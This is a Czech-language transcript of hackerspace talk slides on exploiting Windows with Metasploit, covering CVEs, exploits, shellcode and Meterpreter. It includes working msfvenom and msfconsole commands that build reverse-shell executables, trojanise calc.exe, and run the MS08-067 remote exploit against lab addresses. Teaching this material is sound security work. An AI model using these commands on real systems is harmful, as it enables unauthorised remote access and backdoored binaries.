Hackerspace Pardubice

Transkript

Hackerspace Pardubice
Hackerspace Pardubice
Exploitace Windows pomocí Metasploit
frameworku
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
Zranitelnosti
●
●
●
●
Chyby v kódu aplikace
Způsobeny nepozorností programátora, bugu v knihovnách
nebo běhovém prostředí
Zranitelnosti se evidují ve veřejných databázích
–
CVE (Common Vulnerabities and Exposures)
–
OSVDB (Open Source Vulnerability DataBase
V databázích je uveden technická popis chyby, rating,
odkazy na další zdroje a odkazy na exploity, doporučené
opravení chyby, ...
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
CVE-ID
●
Formát CVE <year>-<arbitrary_digits>
●
arbitrary_digits je ID zranitelnosti v daném roce
●
Starý formát CVE používá 4 místa pro arbitrary_digits
●
Nový formát používá 4 a více míst
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
Exploit
●
Malý program zneužívající chyb v kódu zranitelných
aplikací
●
Závislý na architektuře, OS, verzi aplikace, verzi OS, …
●
Úkolem exploitu je zajistit kontrolovaný pád aplikace
–
●
Analogie: exploit otevírá dveře bez klíče, ovšem nic
jiného
Obvykle exploit obsahuje payload - shellcode
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
Shellcode
●
Skutečný škodlivý kód
●
Většinou se píše v assembleru, velmi často i v binárním kódu
●
Velmi úzce svázán s procesorem cílového počítače
●
●
●
Lze ho použít i samostatně (samostatná .exe binárka,
nakažení jiné aplikace, …)
Shellcode se dá kódovat (obfuskace) a skrýt ho před antiviry
nebo IDS/IPS
Snaha o co nejmenší shellcode (menší shellcode se dá
využít ve více situacích, snáze se propašuje do paměti)
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
Metasploit
●
●
●
Open-source framework s databází exploitů, shellcode,
encoderů, pomocných skriptů, …
Napsaný v ruby
Původní autor je HD Moore, nyní vlastněný společností
rapid7
●
Velmi jednoduchý na použití, oblíbený u Skript Kiddie
●
Několik uživatelských rozhraní
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
Vygenerování .exe souboru
●
# msfvenom --arch x86 --platform windows --format exe -p
windows/shell/reverse_tcp LHOST=192.168.56.103
LPORT=4444 > sploit.exe
–
-p – použitý shellcode
–
LHOST – adresa počítače kterému napadený stroj
předá příkazovou řádku
–
LPORT – port kde naslouchá handler
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
Spuštění handleru
●
Z prostředí msfconsole
●
msf > use exploit/multi/handler
●
set payload windows/shell/reverse_tcp
●
msf exploit(handler) > set LHOST 0.0.0.0
●
msf exploit(handler) > exploit
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
Shellcode + existující exploit
●
Easy RM to MP3 Converter (CVE 2009-1330)
●
Chyba typu buffer overflow
●
# msfvenom --arch x86 --platform windows --format python
-p windows/shell/reverse_tcp LHOST=192.168.56.103
LPORT=4444 EXITFUNC=process --bad-chars
'\x00\x09\x0a'
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
Nakažení .exe binárky
●
# msfvenom --arch x86 --platform windows --format exe -p
windows/shell/reverse_tcp LHOST=192.168.56.103
LPORT=4444 -x calc.exe -k > evil_calc.exe
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
Meterpreter
●
Meta interpreter
●
Velmi dobře skrytý před AV (nevytváří žádné procesy)
●
Šifrovaná komunikace
●
Vykonávání ve dvou fázích
●
–
Úvodní shellcode nejprve stáhne potřebný kód od
útočníka
–
Pomocí DLL injection se načte kód meterpreteru
Kód meterpreteru jde runtime modifikovat po síti
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
Remote exploit
●
●
●
●
●
●
CVE 2008-4250
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload
windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST
192.168.56.103
msf exploit(ms08_067_netapi) > set RHOST
192.168.56.102
exploit
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
Q&A
Děkuji za pozornost
[email protected]
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina
Odkazy
●
Metasploit Unleashed
Exploitace Windows pomocí Metasploit frameworku - Ivo Slanina

Podobné dokumenty

Hackerem snadno a rychle aneb nebezpeční script-kiddies

Hackerem snadno a rychle aneb nebezpeční script-kiddies vyrobí zlomyslný kód (payload, shellcode) sestaví vhodně poškozený vstup (žádost) naváže síťové spojení zašle poškozený vstup (na serveru je spuštěn payload) • (obslouží následnou interakci útočník...

Více

Streamery Pro-ject a Remote Box - Box control

Streamery Pro-ject a Remote Box - Box control obrázek alba ( pokud je obrázek k dispozici ) - Apple Lossless Audio Codec, jedná se o bezztrátovou kopresi zvuku vyvinutý společností Apple, výsledný soubor je velký cca 60% původní velikosti. Avš...

Více

Postup hraní předmíchaných sehravek

Postup hraní předmíchaných sehravek vyhrazen, objeví se tlačítko Připoj se. Hráči se připojí ke stolu a nesmí kliknout na Hrajeme! Musí čekat, až náčelník povolí zahájení hry, protože nahrání sehrávky je možné, jen když je stůl ve vy...

Více

bezpečnost v sítích Martin MaKr Kratochvíl

bezpečnost v sítích Martin MaKr Kratochvíl – heslo obchází pomocí hacku admin.cgi/.gif Šíření: – pomocí „nc“ - požadavky na $IP/admin.cgi Zabezpečení: lighttpd.conf a povolení „.gif“

Více

Ruby On Rails = + Ruby + Rails Jan Strnádek

Ruby On Rails = + Ruby + Rails Jan Strnádek Built-in web servers (Webrick, Puma)

Více

Open Source Programování

Open Source Programování Attribute: attribute in the manner specified in the ODbL.  Keep intact any notices on the original database. Share­Alike: for all database adaptations and all derived  works, provide database under...

Více

Administrace UNIXu

Administrace UNIXu možnost změn v discı́ch za plného provozu ”nadměrná podpora” v Linuxu - problém s připojovánı́m rozdı́lných RAID k jednomu serveru Linux zatı́m postrádá jednotnou podporu pro všechna mu...

Více

Způsoby zabezpečení cloudových služeb Microsoft

Způsoby zabezpečení cloudových služeb Microsoft © 2014 Microsoft Corporation. All rights reserved. The information herein is for informational purposes only and represents the current view of Microsoft Corporation as of the date of this presenta...

Více